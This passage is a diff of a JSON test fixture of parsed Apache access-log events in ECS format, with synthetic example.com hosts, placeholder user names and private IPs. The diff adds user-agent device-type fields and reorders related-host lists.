Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -643,9 +653,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf", "mail.example.net", "example.com", + "https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf", "siuta2896.www.localhost" ], "related.ip": [ @@ -684,6 +694,7 @@ "url.top_level_domain": "com", "user.name": "nsequu", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -749,6 +760,7 @@ "url.top_level_domain": "net", "user.name": "lapariat", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -815,6 +827,7 @@ "url.top_level_domain": "com", "user.name": "des", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -838,9 +851,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.net", + "www.example.org", "https://example.net/tion/eataev.htm?uiineavo=tisetq#irati", - "www.example.org" + "example.net" ], "related.ip": [ "10.57.170.140" @@ -876,6 +889,7 @@ "url.top_level_domain": "net", "user.name": "onse", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -899,9 +913,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "internal.example.net", + "https://internal.example.com/isno/taliq.htm?nnu=dolo#Loremip", "internal.example.com", - "https://internal.example.com/isno/taliq.htm?nnu=dolo#Loremip" + "internal.example.net" ], "related.ip": [ "10.33.153.47" @@ -938,6 +952,7 @@ "url.top_level_domain": "com", "user.name": "atquovo", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -1003,6 +1018,7 @@ "url.top_level_domain": "net", "user.name": "tat", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -1027,8 +1043,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.com", - "https://internal.example.com/oidentsu/atiset.jpg?ntor=lpaqui#sitame", - "internal.example.com" + "internal.example.com", + "https://internal.example.com/oidentsu/atiset.jpg?ntor=lpaqui#sitame" ], "related.ip": [ "10.202.194.67" @@ -1065,6 +1081,7 @@ "url.top_level_domain": "com", "user.name": "ittenbyC", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -1131,6 +1148,7 @@ "url.top_level_domain": "com", "user.name": "modocon", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -1155,8 +1173,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.net", - "www5.example.org", - "https://www5.example.org/eriamea/amre.htm?magni=pisciv#iquidex" + "https://www5.example.org/eriamea/amre.htm?magni=pisciv#iquidex", + "www5.example.org" ], "related.ip": [ "10.52.186.29" @@ -1193,6 +1211,7 @@ "url.top_level_domain": "org", "user.name": "doloreme", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -1217,8 +1236,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.net", "www.example.org", + "example.net", "https://www.example.org/iutali/fdeFi.jpg?liquide=etdol#uela", "oquisqu2937.mail.domain" ], @@ -1259,6 +1278,7 @@ "url.top_level_domain": "org", "user.name": "olor", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -1283,9 +1303,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "mail.example.net", "api.example.org", "https://mail.example.net/itatione/isnis.html?oluptate=issus#osamn", - "mail.example.net", "dolore1287.internal.lan" ], "related.ip": [ @@ -1325,6 +1345,7 @@ "url.top_level_domain": "net", "user.name": "sin", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1349,8 +1370,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www5.example.org", - "www.example.org", - "https://www.example.org/emvel/tmollita.htm?numqua=veni#eveli" + "https://www.example.org/emvel/tmollita.htm?numqua=veni#eveli", + "www.example.org" ], "related.ip": [ "10.62.191.18" @@ -1387,6 +1408,7 @@ "url.top_level_domain": "org", "user.name": "orporiss", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -1410,8 +1432,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.org", "example.net", + "example.org", "https://example.net/nisi/dant.txt?ecte=tinvolu#iurer" ], "related.ip": [ @@ -1448,6 +1470,7 @@ "url.top_level_domain": "net", "user.name": "utlabor", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", @@ -1471,9 +1494,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "example.com", "https://internal.example.com/sintocc/tlabor.txt?tDuisaut=oinBC#quameius", - "internal.example.com", - "example.com" + "internal.example.com" ], "related.ip": [ "10.155.230.17" @@ -1510,6 +1533,7 @@ "url.top_level_domain": "com", "user.name": "ionevo", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1534,9 +1558,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.net/officiad/itam.html?madmi=tur#roi", - "mail.example.net", "example.net", + "mail.example.net", + "https://example.net/officiad/itam.html?madmi=tur#roi", "ide2767.www5.local" ], "related.ip": [ @@ -1575,6 +1599,7 @@ "url.top_level_domain": "net", "user.name": "tenbyCi", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1641,6 +1666,7 @@ "url.top_level_domain": "org", "user.name": "vita", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1664,9 +1690,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://api.example.net/roid/inibusB.jpg?Nemoenim=squirati#Sedutp", "api.example.net", - "example.com" + "example.com", + "https://api.example.net/roid/inibusB.jpg?Nemoenim=squirati#Sedutp" ], "related.ip": [ "10.99.0.226" @@ -1703,6 +1729,7 @@ "url.top_level_domain": "net", "user.name": "uidol", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1726,8 +1753,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "api.example.org", "www.example.net", + "api.example.org", "https://www.example.net/str/idolore.txt?eetdolo=cteturad#untut" ], "related.ip": [ @@ -1765,6 +1792,7 @@ "url.top_level_domain": "net", "user.name": "minimav", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -1790,8 +1818,8 @@ "observer.vendor": "Apache", "related.hosts": [ "https://mail.example.org/iscinge/ofdeFini.jpg?molli=velitse#oditem", - "www.example.org", "mail.example.org", + "www.example.org", "idunt4707.host" ], "related.ip": [ @@ -1831,6 +1859,7 @@ "url.top_level_domain": "org", "user.name": "isnost", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -1893,6 +1922,7 @@ "url.top_level_domain": "org", "user.name": "luptate", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -1918,8 +1948,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.com", - "example.org", "https://example.com/mexe/its.htm?ice=oles#edic", + "example.org", "emquia1497.www5.lan" ], "related.ip": [ @@ -1958,6 +1988,7 @@ "url.top_level_domain": "com", "user.name": "siut", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -2024,6 +2055,7 @@ "url.top_level_domain": "com", "user.name": "tconsect", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -2044,8 +2076,8 @@ "observer.vendor": "Apache", "related.hosts": [ "https://www.example.org/xeacomm/cinge.txt?apariat=vitaedi#lorsita", - "www.example.org", - "internal.example.com" + "internal.example.com", + "www.example.org" ], "related.ip": [ "10.10.213.83" @@ -2082,6 +2114,7 @@ "url.top_level_domain": "org", "user.name": "psum", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -2106,9 +2139,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "https://api.example.org/texpli/exeacom.jpg?rita=esseci#tametcon", "api.example.org", "mail.example.net", - "https://api.example.org/texpli/exeacom.jpg?rita=esseci#tametcon", "aboreetd5461.host" ], "related.ip": [ @@ -2148,6 +2181,7 @@ "url.top_level_domain": "org", "user.name": "urv", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -2172,8 +2206,8 @@ "observer.vendor": "Apache", "related.hosts": [ "api.example.net", - "https://api.example.net/ibusBon/ven.gif?nsequat=doloreme#dun", - "www5.example.org" + "www5.example.org", + "https://api.example.net/ibusBon/ven.gif?nsequat=doloreme#dun" ], "related.ip": [ "10.19.17.202" @@ -2210,6 +2244,7 @@ "url.top_level_domain": "net", "user.name": "mve", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2234,9 +2269,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "mail.example.org", - "api.example.com", "https://mail.example.org/oconsequ/edquiac.gif?preh=ercit#etMal", + "api.example.com", + "mail.example.org", "iquidexe304.mail.test" ], "related.ip": [ @@ -2276,6 +2311,7 @@ "url.top_level_domain": "org", "user.name": "uat", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2342,6 +2378,7 @@ "url.top_level_domain": "com", "user.name": "itesseq", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -2403,6 +2440,7 @@ "url.top_level_domain": "net", "user.name": "amvolupt", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -2427,8 +2465,8 @@ "observer.vendor": "Apache", "related.hosts": [ "mail.example.com", - "api.example.org", - "https://mail.example.com/acommod/itsedd.html?admin=stenatu#inibu" + "https://mail.example.com/acommod/itsedd.html?admin=stenatu#inibu", + "api.example.org" ], "related.ip": [ "10.89.137.238" @@ -2465,6 +2503,7 @@ "url.top_level_domain": "com", "user.name": "ore", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -2488,8 +2527,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.org/Nequepor/eirure.htm?idid=tesse#sequat", "example.org", + "https://example.org/Nequepor/eirure.htm?idid=tesse#sequat", "www5.example.net" ], "related.ip": [ @@ -2526,6 +2565,7 @@ "url.top_level_domain": "org", "user.name": "iusmodte", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -2550,9 +2590,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo", - "www.example.org", "www5.example.net", + "www.example.org", + "https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo", "orin5238.host" ], "related.ip": [ @@ -2592,6 +2632,7 @@ "url.top_level_domain": "org", "user.name": "rcit", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -2615,9 +2656,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www.example.net", "example.net", - "https://example.net/temUt/ptassita.gif?uamnihi=risnis#uov", - "www.example.net" + "https://example.net/temUt/ptassita.gif?uamnihi=risnis#uov" ], "related.ip": [ "10.69.30.196" @@ -2653,6 +2694,7 @@ "url.top_level_domain": "net", "user.name": "elits", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -2713,6 +2755,7 @@ "url.top_level_domain": "com", "user.name": "eporroq", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2737,9 +2780,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.net", - "https://example.net/Sedutpe/prehen.html?rcit=aecatcup#olabor", "api.example.org", + "https://example.net/Sedutpe/prehen.html?rcit=aecatcup#olabor", + "example.net", "agnaaliq1829.mail.test" ], "related.ip": [ @@ -2778,6 +2821,7 @@ "url.top_level_domain": "net", "user.name": "fugitse", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2839,6 +2883,7 @@ "url.top_level_domain": "org", "user.name": "avolu", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -2862,8 +2907,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.com", "api.example.net", + "example.com", "https://api.example.net/mquisn/queips.gif?emUte=molestia#quir" ], "related.ip": [ @@ -2901,6 +2946,7 @@ "url.top_level_domain": "net", "user.name": "henderit", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -2924,9 +2970,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.net/yCic/nder.jpg?itanim=nesciun#saqu", "www.example.org", - "www.example.net" + "www.example.net", + "https://www.example.net/yCic/nder.jpg?itanim=nesciun#saqu" ], "related.ip": [ "10.218.0.197" @@ -2963,6 +3009,7 @@ "url.top_level_domain": "net", "user.name": "econs", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2987,9 +3034,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.com", - "mail.example.com", "https://mail.example.com/ecatcupi/uamei.html?nreprehe=onse#olorem", + "mail.example.com", + "example.com", "iatqu7310.api.home" ], "related.ip": [ @@ -3029,6 +3076,7 @@ "url.top_level_domain": "com", "user.name": "illumqui", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -3054,8 +3102,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.net", - "https://internal.example.net/ection/roquisqu.html?ceroinB=nim#utaliqu", "example.org", + "https://internal.example.net/ection/roquisqu.html?ceroinB=nim#utaliqu", "uamnihil6127.api.domain" ], "related.ip": [ @@ -3095,6 +3143,7 @@ "url.top_level_domain": "net", "user.name": "leumiur", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -3119,9 +3168,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www.example.org", - "mail.example.net", "https://mail.example.net/iutali/itat.txt?Finibus=radi#xeacom", + "mail.example.net", + "www.example.org", "uov1629.internal.invalid" ], "related.ip": [ @@ -3161,6 +3210,7 @@ "url.top_level_domain": "net", "user.name": "quaU", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3184,8 +3234,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://mail.example.net/lmolesti/apariatu.htm?moe=msequ#uat", "internal.example.org", + "https://mail.example.net/lmolesti/apariatu.htm?moe=msequ#uat", "mail.example.net" ], "related.ip": [ @@ -3223,6 +3273,7 @@ "url.top_level_domain": "net", "user.name": "eosquira", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -3289,6 +3340,7 @@ "url.top_level_domain": "org", "user.name": "tiumto", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3351,6 +3403,7 @@ "url.top_level_domain": "net", "user.name": "tesseq", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -3375,8 +3428,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.org", - "internal.example.com", - "https://example.org/pisc/urEx.html?rautod=olest#eataev" + "https://example.org/pisc/urEx.html?rautod=olest#eataev", + "internal.example.com" ], "related.ip": [ "10.5.194.202" @@ -3412,6 +3465,7 @@ "url.top_level_domain": "org", "user.name": "ntmo", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -3436,8 +3490,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www5.example.com/aconse/prehe.gif?diduntu=eiusmod#itation", "www.example.org", + "https://www5.example.com/aconse/prehe.gif?diduntu=eiusmod#itation", "www5.example.com", "deriti6952.mail.domain" ], @@ -3478,6 +3532,7 @@ "url.top_level_domain": "com", "user.name": "isn", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -3501,8 +3556,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "mail.example.net", "internal.example.com", + "mail.example.net", "https://mail.example.net/reetdolo/rationev.html?reetdol=uelauda#ema" ], "related.ip": [ @@ -3540,6 +3595,7 @@ "url.top_level_domain": "net", "user.name": "nBCSe", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -3565,8 +3621,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.com", - "www5.example.com", "https://www5.example.com/mUteni/quira.htm?ore=tation#loinve", + "www5.example.com", "nse3421.mail.localhost" ], "related.ip": [ @@ -3606,6 +3662,7 @@ "url.top_level_domain": "com", "user.name": "ugitsedq", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G 